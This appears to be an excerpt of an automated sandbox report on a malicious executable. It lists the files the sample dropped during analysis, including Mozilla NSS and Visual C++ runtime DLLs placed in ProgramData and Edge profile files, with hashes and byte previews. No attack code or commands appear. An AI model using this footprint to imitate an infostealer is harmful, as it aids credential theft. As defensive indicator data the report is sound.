SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Xg0OdI1VqO.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Xg0OdI1VqO.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\85c9ba9a2d.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\34d702c5-e71a-4742-a629-e2ef271aea97.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44616
Entropy (8bit):	6.096645375036409
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBUwuuhDO6vP6O5iufGf+kWPFI+cGoup1Xl3jVzXr2:z/Ps+wsI7ynES6Egchu3VlXr4CRo1
MD5:	B18CA88DBE8ACF9FCCB8C4FA2D951464
SHA1:	DAA46B77B14F7045AAC231D0E09B7EE815E54B98
SHA-256:	983B16408F0023A866FFEBB46E9BC8DF75CA877C0FD3C56622BB5D22F33973CF
SHA-512:	8AA742D197F0458E1857298ADEDE4F1D8FD58821B6C14D8B676D5CF668409CC406B3A5CC8C521F49662CBF7459208C974E2812A41304A8E12E699DF7C4E9E7B7
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\442fca99-6e15-4d06-a78f-c5014665eefa.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090744016902788
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMRwuF9hDO6vP6O+ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEF6itbz8hu3VlXr4CRo1
MD5:	483BA5D76D4B15F60192CE701BDD1ABB
SHA1:	CA269BA7CD83070F08CA0ACEE73143FEA4791628
SHA-256:	19B5C4AF7864C5136596F68D7EA180D6D460C9BBFED6E1C23B04CCCCD04592FF
SHA-512:	D953A7CE230B0812D4E881E36B6A21A3C674B0779A50C4BA99DE783030CDC6EA315159F97AFFC538648B6FCF5CB0B7D74FFBFEC48EAEB178740E1D9EF33141B8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\69ebebf7-e43c-4d07-af8d-806ad8c4bd39.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45959
Entropy (8bit):	6.087645465924476
Encrypted:	false
SSDEEP:	768:QMkbJrT8IeQcrQga9gVouXhDO6vP6O5iufO7kRnhPqz6VcpYL+CAobGoup1Xl3jG:QMk1rT8H69gQ6EIcp1Robhu3VlXr43
MD5:	13385D597F9A8BE305EDFB4C4B89718C
SHA1:	5BEE9961D2F6F3A75C7C5A210FB270F041F7BE46
SHA-256:	E1843D72D49165F777D54C970052D5A786B0CC81961D2DB64255B43966504590
SHA-512:	FF956C52CA9637E041E5BE7BA5A014755F6F44E7EF0E0D1556A66DC15C8111BAD5821A9FFBDDD109FCDF52E77E1A7BAA114101BBA6A8A6BF3C99A464A1DD2C7C
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1731317600"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\937be506-6abe-4fe5-8b4f-f528b52eaf16.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	45959
Entropy (8bit):	6.0876466855245805
Encrypted:	false
SSDEEP:	768:QMkbJrT8IeQcrQgaogVouXhDO6vP6O5iufO7kRnhPqz6VcpYL+CAobGoup1Xl3jG:QMk1rT8H6ogQ6EIcp1Robhu3VlXr43
MD5:	5C2EDFB2EE69C35C50B300296D1CEE09
SHA1:	54CD16F20AA78EC6F5C9CC213F246E2351FBBDA9
SHA-256:	9D6AFF24E0C2EF56299ECCC7BD980C2C5362EF69CC01D5698D3AB5F7FABA3D5D
SHA-512:	19574AD4EE7E597777B124E9568C09AD83D5B7AAB1A1ADA862DE410FC1E981076DB7E5C0DE5627671B834F9560AC14BB92DAAAAD42C0FC53B9B2A6E8B19894E3
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1731317600"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640132669903667
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7+:fwUQC5VwBIiElEd2K57P7+
MD5:	18D8F6617A5020376CEDA06FB42C24D5
SHA1:	F921FF53D8E1A065550AD835D89E550FDF448795
SHA-256:	C0E1D05E90044F0F5810E83826BE6449D44234CD601668E5E041FE7F3B2CAB32
SHA-512:	4FC6D77BDE79EB4EA56D8CFAEE5908C6D9233E65AD199C52A7425B76ECE9869466D3BE52E2A20B85FE50ABD712C57D8591DEBDDB9F3CBA45070E3233CC185DA4
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\d66053e7-6f8e-4534-be75-716ee4df494a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640132669903667
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7+:fwUQC5VwBIiElEd2K57P7+
MD5:	18D8F6617A5020376CEDA06FB42C24D5
SHA1:	F921FF53D8E1A065550AD835D89E550FDF448795
SHA-256:	C0E1D05E90044F0F5810E83826BE6449D44234CD601668E5E041FE7F3B2CAB32
SHA-512:	4FC6D77BDE79EB4EA56D8CFAEE5908C6D9233E65AD199C52A7425B76ECE9869466D3BE52E2A20B85FE50ABD712C57D8591DEBDDB9F3CBA45070E3233CC185DA4
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	B5CFA9D6C8FEBD618F91AC2843D50A1C
SHA1:	2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
SHA-256:	BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
SHA-512:	BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6731CF5A-1ED8.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.488107842041333
Encrypted:	false
SSDEEP:	6144:AM0SEcjeclobA1u9ctIql0+Z5s1B2aHaq:vlomu9Tl
MD5:	E06FCBA26D52783B6202509FE4B12EF9
SHA1:	81F5E4759DF70549CD2FEC99E1750AB3485AB49F
SHA-256:	D934DF2B72EF393E9213C158328232C561C718EFCA3D1ECCDCB7CAF85A79CF2C
SHA-512:	F249490F8126DBAEF5ACF5A246734474235FBFF1B9FCDD2BA2D0AFCAEFD5081A7DAE0B5298BE783DC589B737A6A089EDD54C46AF05F1853AC19B2CA387921CAA
Malicious:	false
Preview:	...@..@...@.....C.].....@...............`..................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".vyrkgr20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................ .2.....

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.132041621771752
Encrypted:	false
SSDEEP:	3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
MD5:	845CFA59D6B52BD2E8C24AC83A335C66
SHA1:	6882BB1CE71EB14CEF73413EFC591ACF84C63C75
SHA-256:	29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
SHA-512:	8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
Malicious:	false
Preview:	sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\54cf49f5-fe0c-41c3-942a-67f8abb3536b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17595), with no line terminators
Category:	dropped
Size (bytes):	17597
Entropy (8bit):	5.473754014249332
Encrypted:	false
SSDEEP:	384:stWPGKSu4rsMiqfhGo2sW9cLpbGM4Qwb6WaBlaTY4:scOxu0iqff89c1bGMHIGvaTY4
MD5:	7474CDA1B8F611BFF813A129DE9DA2F8
SHA1:	392E05BDD3B9E0FB7F3784CE0927C236A2F9F7F3
SHA-256:	402BFFD34F5EF223A51E02226586096B756105BAD00EC783663DD76AD71EF05D
